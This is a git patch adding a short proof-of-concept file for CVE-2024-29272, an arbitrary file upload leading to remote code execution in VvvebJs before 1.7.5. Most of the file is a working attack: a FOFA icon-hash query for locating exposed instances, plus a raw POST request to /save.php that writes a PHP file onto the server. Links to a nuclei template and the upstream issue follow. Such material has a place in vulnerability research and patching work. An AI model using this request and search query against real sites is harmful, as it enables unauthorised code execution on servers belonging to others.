From 789a1566a0c9bba4095373915a98609bef346e70 Mon Sep 17 00:00:00 2001
From: Halil <90972683+Kazgangap@users.noreply.github.com>
Date: Mon, 26 Aug 2024 13:53:44 +0300
Subject: [PATCH] Add files via upload

---
 ...rary File Upload - RCE (CVE-2024-29272).md | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 VvvebJs/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md

diff --git a/VvvebJs/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md b/VvvebJs/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md
new file mode 100644
index 00000000..ff06b538
--- /dev/null
+++ b/VvvebJs/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md	
@@ -0,0 +1,20 @@
+## VvvebJs < 1.7.5 Arbitrary File Upload - RCE (CVE-2024-29272)
+
+## fofa
+```
+icon_hash="524332373"
+```
+## poc
+```
+POST /save.php HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+file=demo%2Flanding%2Findex.php&html=<?php%20phpinfo();%20?>
+```
+## nuclei Template
+https://github.com/projectdiscovery/nuclei-templates/pull/10608/files
+
+## ref
+https://github.com/givanz/VvvebJs/issues/343
+https://github.com/awjkjflkwlekfdjs/CVE-2024-29272/tree/main
\ No newline at end of file